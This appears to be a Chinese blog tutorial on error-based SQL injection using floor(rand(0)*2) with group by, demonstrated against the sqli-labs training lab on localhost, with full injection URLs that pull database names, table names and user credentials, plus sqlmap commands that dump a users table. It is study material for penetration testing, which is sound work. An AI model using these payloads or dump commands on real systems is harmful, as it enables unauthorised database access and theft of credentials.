SQL | GET报错注入

最新推荐文章于 2022-04-30 20:41:12 发布
最新推荐文章于 2022-04-30 20:41:12 发布
阅读量825 收藏
点赞数 1
分类专栏: 信息安全 渗透测试学习 Web安全 文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m_de_g/article/details/121719589
版权
本文深入探讨了SQL注入攻击,包括GET单引号和双引号报错注入的实例,展示了如何利用rand()、floor()等函数获取数据库、表名和用户信息。同时,介绍了自动化工具Sqlmap的使用,如获取数据库、数据表、字段及内容,强调了其在安全测试中的高效性。
摘要由CSDN通过智能技术生成

SQL | GET报错注入

1.报错注入介绍

报错注入形式上是两个嵌套的查询,即select…(select…),里面的那个select被称为子查询,他的执行顺序也是先执行子查询,
然后再执行外面的select,双注入主要涉及到了几个SQL函数:
rand()随机函数,返回0~1之间的某个值
floor(a)向下取整函数,返回小于等于a,且值最接近a的一个整数
count()聚合函数也称作计数函数,返回查询对象的总数
group by clase分组语句,按照查询结果分组
通过报错来显示具体信息

查询的时候如果使用rand()的话,该值会被计算多次。在使用group by的时候,floor(rand(0)*2)会被执行一次,如果虚表不存在记录,插入虚表的时候会再执行一次。在一次多记录的查询过程中floor(rand(0)*2)的值是定性的,为011011

select count(*) from 表名 group by floor(rand(0)*2);

2.GET单引号报错注入

Sqli-Lab Less 5为例
1.获取数据库

http://localhost/sqli-labs-master/Less-5/?id=-1' union select 1,2,3 from(select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+

在这里插入图片描述
2.获取表名

http://localhost/sqli-labs-master/Less-5/?id=-1' union select 1,2,3 from(select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+

在这里插入图片描述
3.获取用户信息

http://localhost/sqli-labs-master/Less-5/?id=-1' union select 1,2,3 from(select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+

在这里插入图片描述

3.GET双引号报错注入

与单引号注入大同小异
1.获取数据库

http://localhost/sqli-labs-master/Less-6/?id=1" union select 1,2,3 from(select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+

在这里插入图片描述
2.获取数据表

http://localhost/sqli-labs-master/Less-6/?id=1" union select 1,2,3 from(select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+

在这里插入图片描述
3.获取用户信息

http://localhost/sqli-labs-master/Less-6/?id=1" union select 1,2,3 from(select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+

在这里插入图片描述

4.Sqlmap安全测试

在我们实战或工作当中,报错注入使用手动测试可能会影响效率,我们还是使用sqlmap进行测试
1.获取数据库

python2 sqlmap.py -u "http://localhost/sqli-labs-master/Less-5/?id=1" --current-db

在这里插入图片描述
2.获取数据库中的数据表

python2 sqlmap.py -u "http://localhost/sqli-labs-master/Less-5/?id=1" -D security --tables

在这里插入图片描述
3.获取字段名

python2 sqlmap.py -u "http://localhost/sqli-labs-master/Less-5/?id=1" -D security -T users --columns

在这里插入图片描述
4.获取字段中的内容

python2 sqlmap.py -u "http://localhost/sqli-labs-master/Less-5/?id=1" -D security -T users -C "username,password" --dump

在这里插入图片描述

山川绿水
关注
专栏目录
SQL注入报错注入
qq_45557130的博客
10-07 566
sql注入报错注入
SQL注入系列篇 | 报错注入
d59hao的博客
05-05 950
报错注入是通过构造恶意SQL,使数据库报错,从报错信息中得到敏感信息的方法。如果服务器应用没有对这种错误进行处理,则攻击者可以通过页面的错误回显获取数据。
GET报错注入
qq_43776408的博客
06-09 656
报错介绍 使用的正常的语句无法显示想要查询的数据,然后我们故意输入错的语句来强迫数据库 爆出数据来 GET单引号报错注入 以less-5为例 原sql语句 select * from admin where id=‘id’ limit 0,1 回顾一下 浏览器输入id=1正确 显示you are in 在输入id=1 显示错误 you have an error in "1’ LIMIT 0,1’ 去掉外引号 ‘1’ LIMIT 0,1 你想啊,输入1是对的 但是输入1\是错的 所以就是多出了一个\
GET基于报错SQL注入
qq_43776408的博客
06-04 467
SQL注入分类 GET基于报错SQL注入发现 你先下载sqli,还有phpstudy集成环境 上述你之前都玩过 浏览器输入ip/sqli 你会看到类似于树的分支一样的东西 当中第一个Less1就是今天我们要学的 还有后面几个带有Error 重点看那行黄字 然后浏览器输入ip/sqli/Less-1/?id=1 回车 界面就变了 数字可以自行改变 接下来后面加一个单引号 再次回车 ’‘14‘’LIMIT 0,1’ at line 1’ 先去掉左右单引号 ‘14‘’LIMIT 0,1’ at line
13、报错注入(Get)
weixin_41489908的博客
12-02 189
环境sqli-labs less 5 1、我们随便输入’,看到报错信息 可以判断,需要单引号闭合 2、构造查询获取数据库名称语句 http://192.168.1.120/sqli/Less-5/?id=1’ union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),...
1-8 GET报错注入
LoveStarbucks的博客
12-29 249
1-8 GET报错注入 1.报错注入介绍 floor报错注入的原理( https://www.cnblogs.com/xdans/p/5412468.html ) 2.GET单引号报错注入 Sqli-Lab less5 只能使用报错获得我们想要获得的信息 (2)构造报错语句 3.GET双引号报错注入 4.Sqlmap安全测试(前面的测试手写比较麻烦这个是重点) Sqlmap操作跟前面的...
第六节 GET报错注入-01
最新发布
09-15
第六节的讨论聚焦于一种常见的安全漏洞,称为“GET报错注入”。报错注入是Web应用程序中的一个严重问题,它允许攻击者通过诱使系统产生错误消息来揭示敏感信息。这种攻击方式通常利用了应用程序对错误处理不当,使得...
SQL报错注入
qq_64332865的博客
02-18 606
基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、 updatexml)、floor()、exp()等。 关于floor()函数,在进行报错注入时,floor()函数一般需要与rand()、count()、g
Sql漏洞注入之报错注入
Matheus的博客
07-22 883
报错注入 在MYSQL中使用一些指定的函数来制造报错,后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端,从而从报错信息中获取设定的信息。select/insert/update/delete都可以使用报错来获取信息。 报错注入流程: 1)判断是否存在注入点。 2)构造错误的语法制造报错。 3)使用对应的报错函数来获取信息。 常用的报错函数: 基于函数报错的信息获取(select/insert/update/delete) updatexml() updatexml()函数是MYSQL对XML
GET报错注入Sqli-labs第一题详解)
Hardworking666的博客
01-06 2008
文章目录一、找注入点二、order by判断列数三、union联合注入,判断数据显示点四、爆库、爆表 一、找注入点 单引号注入题目,在参数后面加一个单引号: /?id=1' 数据库报错,单引号匹配出错,即添加的单引号成功被数据库解析,可以通过闭合id参数,插入构造的sql语句实施攻击。 二、order by判断列数 order by 1、2、3都尝试,无报错。 /?id=1' order by 4 --+ 用4的话报错:Unknown column ‘4’ in ‘order clause’ 证明..
GET基于报错的注入
qq_40710190的博客
10-15 408
GET基于报错的注入 报错注入形式上是两个嵌套的查询,即select…(select…),里面的select被称为子查询,他的执行顺序也是先执行子查询,再执行外面的select,双注入主要涉及到了几个SQL函数: rand()随机函数,返回0~1之间的某个值 floor(a) 取整函数,返回小于等于a,且值最接近a的一个整数 count()聚合函数也称作计数函数,返回查询对象的总数 SQL COUNT(*) 函数 定义和用法 COUNT(*) 函数返回在给定的选择中被选的行数。 语法 SE
报错基于GET的注入
qq_40710190的博客
09-28 263
报错基于GET的注入GET-Error based lesson1 Single quotes-String 判断是数字型还是字符型 这一点还是很好判断的,在有报错提示下的话。这里的例子基于sqli-labs的lesson1和lesson2。 ?id=1' 得到报错 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right synta
SQL中的GET显错注入
m0_69676459的博客
04-30 600
SQL中GET注入
SQL注入之报错型注入
selecthch的博客
06-09 5715
报错注入的前提:页面上没有显示位但是有sql语句执行错误信息输出。mysql_error()函数作用:返回上一个Mysql操作产生的文本错误信息如:      在用php对mysql进行一些增删改查操作的时候,如果数据库在执行的过程 中遇到错误,此时数据库是有错误回显的,但是这个错误回显不会显示在Web应 用页面中的。       如下是php脚本错误信息需要php.ini 中display_er...
CTF|SQL显错注入
算法与编程之美
07-31 392
精选30+云产品,助力企业轻松上云!>>> ...
SQL注入之报错注入攻击
coderge's CSDN Blog.
09-17 928
目录 1 环境介绍 2 实验过程 本文采用的是《Web安全攻防渗透测试实战指南》提供的代码及数据库。 1 环境介绍 在报销注入页面中,程序获取GET参数username后,将username拼接到SQL语句中,然后到数据库查询。如果执行成功,就输出ok;如果出错,则通过echo mysqli_ error($con),将错误信息输出到页面(mysqli_error返回上一个MySQL函数的错误),代码如下所示。 error.php <?php $con=mysqli_connect("
显错注入(三)
qq_45300786的博客
07-01 526
显错注入(三) 注入环境:http://inject2.lab.aqlab.cn:81/Pass-03/index.php?id=1 SQL注入原理解析以及举例1   sql注入是指web应用程序对用户输入数据的合法性没有判断, 导致攻击者可以构造不同的sql语句来实现对数据库的操作。   sql注入漏洞产生满足条件:     1;用户能够控制数据的输入。     2;原本需要执行的代码,拼接了用户的输入。  举例:   注意:下面测试环境使用封神台免费靶场。可以从下面链接进入:https://hack.z
显错注入(四)
qq_45300786的博客
07-02 349
显错注入(四) 注入环境:http://inject2.lab.aqlab.cn:81/Pass-04/index.php?id=1 SQL注入原理解析以及举例1   sql注入是指web应用程序对用户输入数据的合法性没有判断, 导致攻击者可以构造不同的sql语句来实现对数据库的操作。   sql注入漏洞产生满足条件:     1;用户能够控制数据的输入。     2;原本需要执行的代码,拼接了用户的输入。  举例:   注意:下面测试环境使用封神台免费靶场。可以从下面链接进入:https://hack.z
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值